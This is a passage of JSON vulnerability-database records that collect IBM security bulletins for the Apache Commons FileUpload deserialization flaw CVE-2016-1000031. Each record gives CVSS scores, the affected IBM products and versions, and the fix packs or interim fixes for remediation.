"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-07T17:00:01", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerability Can Affect IBM Sterling Order Management (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-02-07T17:00:01", "id": "B09323FD9F65F6065C7B68F00028DEBB77D6AFCCF024832FCF79623893150BE7", "href": "https://www.ibm.com/support/pages/node/870454", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:53:06", "description": "## Summary\n\nThe DiskFileItem class in Apache Commons Fileupload before 1.3.3, as used in IBM WebSphere MQ Managed File Transfer, specifically the Web Gateway component, allows remote attackers to execute arbitrary code under current context of the current process causing an undefined behavior.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in IBM WebSphere MQ Managed File Transfer, specifically the Web Gateway component, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM WebSphere MQ v7.5.0.0 to v7.5.0.8 \n\nIBM WebSphere MQ v8.0.0.0 to v8.0.0.8\n\n## Remediation/Fixes\n\n**IBM WebSphere MQ v7.5.0.0 to v7.5.0.8**\n\nUpdate to, if not already, IBM WebSphere fix pack [7.5.0.8](<http://www-01.ibm.com/support/docview.wss?uid=swg22005413>) and then apply interim fix [7.5.0.8-WS-MQ-MFT-IT23627 ](<https://www-945.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=7.5.0.8-WS-MQ-MFT-IT23627&continue=1>)\n\nI**BM WebSphere MQ v8.0.0.0 to v8.0.0.8**\n\nApply fix pack [ 8.0.0.9](<http://www-01.ibm.com/support/docview.wss?uid=swg22015103>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:43", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerabilities in IBM WebSphere MQ Managed File Transfer component (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:43", "id": "795D3F68D07925B1C9C765AAF8DA73C30C8A6490AD9D7941029C418A30C9FF2C", "href": "https://www.ibm.com/support/pages/node/301607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:45:28", "description": "## Summary\n\nApache Commons FileUpload library, located in commons-fileupload-1.2.2.jar that is installed with IBM Dynamic Workload Console, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Workload Dynamic Console 8.6.0 FP04 and earlier \nIBM Workload Dynamic Console 9.1.0 FP02 and earlier \nIBM Workload Dynamic Console 9.2.0 FP02 and earlier \nIBM Workload Dynamic Console 9.3.0 FP03 and earlier\n\n## Remediation/Fixes\n\nAPAR IJ02685 has been opened to address the FileUpload library vulnerability for IBM Dynamic Workload Console. \n\nThe apar will be fixed in the following fixpacks\n\n8.6.0-TIV-TWS-FP0005 \n9.1.0-TIV-TWS-FP0003 \n9.2.0-TIV-TWS-FP0003 \n9.3.0-TIV-TWS-FP0004 \n \nThe vulnerability has already been fixed in 9.4.0-TIV-TWS-FP0002.\n\nFor Unsupported releases IBM recommends upgrading to a fixed, supported release of the product.\n\n## Workarounds and Mitigations\n\nNot Applicable\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:48:07", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload library in IBM Workload Console can allow a remote attacker to execute arbitrary code on the system (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:48:07", "id": "FB301BD274079F5B2C88A19B0C86981A277D606738CBEB57758A65ED178BA0FC", "href": "https://www.ibm.com/support/pages/node/302269", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:29", "description": "## Summary\n\nIBM C\u00faram Social Program Management uses the Apache Commons FileUpload Library. Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \n_CVSS Base Score: 9.8 \nCVSS Temporal Score: See _[__https://exchange.xforce.ibmcloud.com/vulnerabilities/117957__](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>)_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)_\n\n## Affected Products and Versions\n\nIBM C\u00faram Social Program Management 7.0.2.0 - 7.0.2.0 \nIBM C\u00faram Social Program Management 7.0.0.0 - 7.0.1.1 \nIBM C\u00faram Social Program Management 6.2.0.0 - 6.2.0.6 \nIBM C\u00faram Social Program Management 6.1.0.0 - 6.1.1.6 \nIBM C\u00faram Social Program Management 6.0.5.0 - 6.0.5.10\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| _Remediation/First Fix_ \n---|---|--- \nIBM C\u00faram Social Program Management| 7.0.2| Visit IBM Fix Central and upgrade to [_7.0.2.0_iFix1_](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=7.0.2.0&platform=All&function=all>) or a subsequent 7.0.2 release \nIBM C\u00faram Social Program Management| 7.0| Visit IBM Fix Central and upgrade to [_7.0.1.1_iFix3_](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=7.0.1.1&platform=All&function=all>) or a subsequent 7.0.1 release \nIBM C\u00faram Social Program Management| 6.2| Visit IBM Fix Central and upgrade to [_6.2.0.6_iFix1_](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.2.0.6&platform=All&function=all>) or a subsequent 6.2.0 release \nIBM C\u00faram Social Program Management| 6.1| Visit IBM Fix Central and upgrade to [_6.1.1.6_iFix1_](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.1.1.6&platform=All&function=all>) or a subsequent 6.1.1 release \nIBM C\u00faram Social Program Management| 6.0.5| Visit IBM Fix Central and upgrade to [_6.0.5.10 iFix3_](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.5.10&platform=All&function=all>) or a subsequent 6.0.5 release \n \n## Workarounds and Mitigations\n\nFor information on all other versions please contact C\u00faram Customer Support.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:09:54", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload affects IBM C\u00faram Social Program Management (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T13:09:54", "id": "B30027B67E0900B9C9192B0EB28EA6D42DDFB696208646582631F912C14CE66F", "href": "https://www.ibm.com/support/pages/node/302599", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:47:00", "description": "## Summary\n\nAtlas eDiscovery Process Management has addressed Apache Commons FileUpload vulnerability, which could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nAtlas eDiscovery Process Management 6.0.3.2 - 6.0.3.6\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nAtlas eDiscovery Process Management| 6.0.3.2 - 6.0.3.6| Use Atlas eDiscovery Process Management version 6.0.3.6 [](<http:///>)[Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Atlas%20eDiscovery&product=ibm/Information+Management/Atlas+eDiscovery+Process+Management&release=6.0.3.6&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:28", "type": "ibm", "title": "Security Bulletin: Atlas eDiscovery Process Management is affected by Apache Open Source Commons FileUpload Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:28", "id": "D33BBD3C5F74DBFB7700F90DA29C0A0F17319D5EFCD29BE614C5EEA53697BBA1", "href": "https://www.ibm.com/support/pages/node/567925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:41:28", "description": "## Summary\n\nAsset Analyzer (RAA) has addressed the following vulnerability. Open Source Commons FileUpload Apache Vulnerabilities \n\n## Vulnerability Details\n\n \n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n**Affected Asset Analyzer (RAA)**\n\n| \n\n**Affected Versions** \n \n---|--- \nRational Asset Analyzer| 6.1.0.16 and previous \n. \n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**APAR**\n\n| \n\n**Remediation / First Fix** \n \n---|---|---|--- \nRational Asset Analyzer| 6.1.0.17| \\--| <http://www-01.ibm.com/support/docview.wss?uid=swg27021389> \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: Rational Asset Analyzer (RAA) is affected by an \nOpen Source Commons FileUpload Apache vulnerability.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-08-03T04:23:43", "id": "681418AA2780D10FE3FE75923CF33BFCB1F9F3C8FD6FEF47FC5127CBC92BB2A5", "href": "https://www.ibm.com/support/pages/node/571363", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:43:53", "description": "## Summary\n\nA vulnerability in Apache Commons FileUpload affects IBM Spectrum Protect\u2122 Plus. This vulnerability could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Spectrum Protect Plus 10.1.0. and 10.1.1. \n\n## Remediation/Fixes\n\n**_IBM Spectrum Protect Plus Release_**\n\n| **_First Fixing \nVRM Level_**| **_Platform_**| **_Link to Fix / Fix Availability Target_** \n \n---|---|---|--- \n10.1| 10.1.1 patch1| Linux| <http://www.ibm.com/support/docview.wss?uid=swg24044571> \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:51:52", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload vulnerability affects IBM Spectrum Protect Plus (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:51:52", "id": "987312D6FC46CA3F269FCE6582D23DFEE688D79E6FE8D1293ED88A90F27657C7", "href": "https://www.ibm.com/support/pages/node/571637", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:43:56", "description": "## Summary\n\nFix is available for vulnerability in Apache Commons FileUpload affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2016-1000031).\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nTivoli Netcool/OMNIbus WebGUI 8.1.0 \nTivoli Netcool/OMNIbus WebGUI 7.4.0\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/Fix** \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ04482| Apply Fix Pack 13 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 13](<http://www.ibm.com/support/docview.wss?uid=swg24044415>)) \nTivoli Netcool/OMNIbus WebGUI| 7.4.0| IJ04482| Upgrade to WebGUI 8.1.0 and then apply Fix Pack 13 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 13](<http://www.ibm.com/support/docview.wss?uid=swg24044415>)) \n \n**Please also note the**** **[**end of support announcement**](<http://www-01.ibm.com/common/ssi/ShowDoc.wss?docURL=/common/ssi/rep_ca/8/897/ENUS917-138/index.html&lang=en&request_locale=en>)** ****from 12 September 2017 for selected Netcool product versions. You can find detailed information on whether the product version you have installed in your environment is affected by this end of service announcement by following the**** **[**Netcool End of Support Knowledge Collection**](<https://www-01.ibm.com/support/entdocview.wss?uid=swg22009231>)**. ****If your product version is affected, IBM recommend to upgrade your product version to the latest supported version of your product. Please contact your IBM account manager for any question you might have or for any assistance you may require for upgrading an end of service announced offering.**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:51:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload affects Tivoli Netcool/OMNIbus WebGUI (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:51:45", "id": "AA02BE79DCD02EDB1B362BC22E1303156066D6065A6A81B509F48BDDA3058239", "href": "https://www.ibm.com/support/pages/node/571119", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:44:05", "description": "## Summary\n\nIBM Tivoli Business Service Manager has addressed the following vulnerability, Open Source Apache Commons FileUpload vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM ****Tivoli Business Service Manager**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Tivoli Business Service Manager 6.1.0| 6.1.0.0~6.1.0.4 \nIBM Tivoli Business Service Manager 6.1.1| 6.1.1.0~6.1.1.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation / First Fix** \n---|---|---|--- \nIBM Tivoli Business Service Manager 6.1.0| _6.1.0.4 IF7_| _None_| [IBM Tivoli Business Service Manager V6.1.0.4 Interim Fix 7](<http://www-01.ibm.com/support/docview.wss?uid=swg24044675>) \nIBM Tivoli Business Service Manager 6.1.1| _6.1.1.5 IF5_| _None_| [IBM Tivoli Business Service Manager V6.1.1.5 Interim Fix 5](<http://www-01.ibm.com/support/docview.wss?uid=swg24044699>) \n \n**Please also note the**** **[**_end of support announcement_**](<http://www-01.ibm.com/common/ssi/ShowDoc.wss?docURL=/common/ssi/rep_ca/8/897/ENUS917-138/index.html&lang=en&request_locale=en>)** ****from 12 September 2017 for selected Netcool product versions. You can find detailed information on whether the product version you have installed in your environment is affected by this end of service announcement by following the**** **[**_Netcool End of Support Knowledge Collection_**](<https://www-01.ibm.com/support/entdocview.wss?uid=swg22009231>)**. ****If your product version is affected, IBM recommend to upgrade your product version to the latest supported version of your product. Please contact your IBM account manager for any question you might have or for any assistance you may require for upgrading an end of service announced offering.**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:50:43", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Business Service Manager is affected by an Open Source Apache Commons FileUpload vulnerability (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:50:43", "id": "9885EF692D10F55B10165D028D563DA2E874C62358D512573E854BC6EF0EF9FE", "href": "https://www.ibm.com/support/pages/node/568703", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:44:05", "description": "## Summary\n\nIBM Tivoli Netcool Impact has addressed the following vulnerability, Open Source Apache Commons FileUpload vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for 